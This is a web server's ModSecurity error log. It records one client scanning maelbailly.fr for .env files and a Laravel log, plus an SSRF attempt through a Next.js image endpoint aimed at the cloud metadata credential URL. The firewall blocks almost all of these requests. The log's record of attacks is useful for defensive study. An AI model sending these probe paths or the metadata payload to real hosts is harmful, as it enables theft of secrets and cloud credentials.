[Tue May 12 03:28:04.760292 2026] [security2:error] [pid 1730175:tid 1730191] [client 93.123.109.165:22812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI3o6NvB9WXx5V-6EkwAAAQ4"]
[Tue May 12 03:28:04.769385 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:22836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env.txt"] [unique_id "agKCJDue9Sp-pIv_Bb6bwQAAAU0"]
[Tue May 12 03:28:04.769591 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:22836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env.txt"] [unique_id "agKCJDue9Sp-pIv_Bb6bwQAAAU0"]
[Tue May 12 03:28:04.922021 2026] [security2:error] [pid 1691274:tid 1691290] [client 93.123.109.165:22780] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 20 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI1fdQaraX_prmqcqGwAAAA0"]
[Tue May 12 03:28:04.954598 2026] [security2:error] [pid 1695975:tid 1695998] [client 93.123.109.165:22846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI9VI9ymHBxup74-VzwAAAJQ"]
[Tue May 12 03:28:05.035572 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/jcrop/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-includes/js/jcrop/
[Tue May 12 03:28:05.093513 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:22730] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI9VI9ymHBxup74-VzgAAAJE"]
[Tue May 12 03:28:05.104553 2026] [security2:error] [pid 1691274:tid 1691280] [client 93.123.109.165:22760] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI1fdQaraX_prmqcqHAAAAAM"]
[Tue May 12 03:28:05.189498 2026] [security2:error] [pid 1730207:tid 1730230] [client 93.123.109.165:22766] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCIzue9Sp-pIv_Bb6bvwAAAVU"]
[Tue May 12 03:28:05.234578 2026] [security2:error] [pid 1707624:tid 1707699] [client 93.123.109.165:22754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7OxS7i6i_mT2NLS4AAAAFE"]
[Tue May 12 03:28:05.272255 2026] [security2:error] [pid 1707624:tid 1707695] [client 93.123.109.165:22790] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7OxS7i6i_mT2NLS4gAAAE0"]
[Tue May 12 03:28:05.283698 2026] [security2:error] [pid 1709071:tid 1709099] [client 93.123.109.165:22736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCI7vMumyrWMfSu7q0sAAAAMw"]
[Tue May 12 03:28:05.523324 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:17922] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/backend/.env"] [unique_id "agKCJTue9Sp-pIv_Bb6bwgAAAUw"]
[Tue May 12 03:28:05.523474 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:17922] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/backend/.env"] [unique_id "agKCJTue9Sp-pIv_Bb6bwgAAAUw"]
[Tue May 12 03:28:05.529054 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:17948] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "maelbailly.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKCJbvMumyrWMfSu7q0tAAAAMM"]
[Tue May 12 03:28:05.529290 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:17948] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKCJbvMumyrWMfSu7q0tAAAAMM"]
[Tue May 12 03:28:05.798672 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:22836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCJDue9Sp-pIv_Bb6bwQAAAU0"]
[Tue May 12 03:28:06.473637 2026] [security2:error] [pid 1730207:tid 1730221] [client 93.123.109.165:17922] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCJTue9Sp-pIv_Bb6bwgAAAUw"]
[Tue May 12 03:28:06.543899 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:17948] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCJbvMumyrWMfSu7q0tAAAAMM"]
[Tue May 12 03:28:09.657535 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/themes/twentytwentytwo/assets/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:28:11.112953 2026] [autoindex:error] [pid 1730175:tid 1730199] [client 85.203.21.152:42501] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/themes/twentytwentytwo/assets/fonts/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-content/themes/twentytwentytwo/assets/fonts/
[Tue May 12 03:28:11.509759 2026] [security2:error] [pid 1709071:tid 1709093] [client 93.123.109.165:18202] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "maelbailly.fr"] [uri "/_next/image/"] [unique_id "agKCK7vMumyrWMfSu7q0uwAAAMY"]
[Tue May 12 03:28:11.510972 2026] [security2:error] [pid 1709071:tid 1709093] [client 93.123.109.165:18202] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/_next/image/"] [unique_id "agKCK7vMumyrWMfSu7q0uwAAAMY"]
[Tue May 12 03:28:14.587709 2026] [security2:error] [pid 1709071:tid 1709093] [client 93.123.109.165:18202] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCK7vMumyrWMfSu7q0uwAAAMY"]
[Tue May 12 03:28:15.710287 2026] [security2:error] [pid 1695975:tid 1695995] [client 43.157.67.70:51460] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/depositphotos_25644061_original/"] [unique_id "agKCL9VI9ymHBxup74-V6gAAAJE"]
[Tue May 12 03:28:19.963871 2026] [security2:error] [pid 1730175:tid 1730190] [client 43.157.67.70:58612] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_25644061_original.jpg"] [unique_id "agKCM3o6NvB9WXx5V-6EswAAAQ0"], referer: https://rentparadise.fr/depositphotos_25644061_original/
[Tue May 12 03:28:20.484987 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:43022] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCNLvMumyrWMfSu7q0zAAAAMM"]
[Tue May 12 03:28:20.485184 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:43022] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCNLvMumyrWMfSu7q0zAAAAMM"]
[Tue May 12 03:28:21.434964 2026] [security2:error] [pid 1709071:tid 1709090] [client 93.123.109.165:43022] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCNLvMumyrWMfSu7q0zAAAAMM"]
[Tue May 12 03:28:25.338998 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:34162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCOXo6NvB9WXx5V-6EuAAAAQw"]
[Tue May 12 03:28:25.339194 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:34162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/.env"] [unique_id "agKCOXo6NvB9WXx5V-6EuAAAAQw"]
[Tue May 12 03:28:26.306745 2026] [security2:error] [pid 1730175:tid 1730189] [client 93.123.109.165:34162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCOXo6NvB9WXx5V-6EuAAAAQw"]
[Tue May 12 03:28:26.669942 2026] [autoindex:error] [pid 1695975:tid 1695986] [client 85.203.21.101:60031] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:28:27.594837 2026] [autoindex:error] [pid 1707624:tid 1707685] [client 85.203.21.109:64859] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive, referer: http://dev.tct-telecom.fr/wp-admin/css/colors/coffee/
[Tue May 12 03:28:27.625654 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.165:34164] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.maelbailly.fr"] [uri "/.env"] [unique_id "agKCO1fdQaraX_prmqcqQQAAAAU"], referer: https://maelbailly.fr/.env
[Tue May 12 03:28:27.625860 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.165:34164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.maelbailly.fr"] [uri "/.env"] [unique_id "agKCO1fdQaraX_prmqcqQQAAAAU"], referer: https://maelbailly.fr/.env
[Tue May 12 03:28:28.574278 2026] [security2:error] [pid 1691274:tid 1691282] [client 93.123.109.165:34164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.maelbailly.fr"] [uri "/index.php"] [unique_id "agKCO1fdQaraX_prmqcqQQAAAAU"], referer: https://maelbailly.fr/.env
[Tue May 12 03:28:29.703885 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:34184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCPTue9Sp-pIv_Bb6b5AAAAUQ"]
[Tue May 12 03:28:29.704079 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:34184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "maelbailly.fr"] [uri "/api/.env"] [unique_id "agKCPTue9Sp-pIv_Bb6b5AAAAUQ"]
[Tue May 12 03:28:30.633918 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:34184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "maelbailly.fr"] [uri "/index.php"] [unique_id "agKCPTue9Sp-pIv_Bb6b5AAAAUQ"]
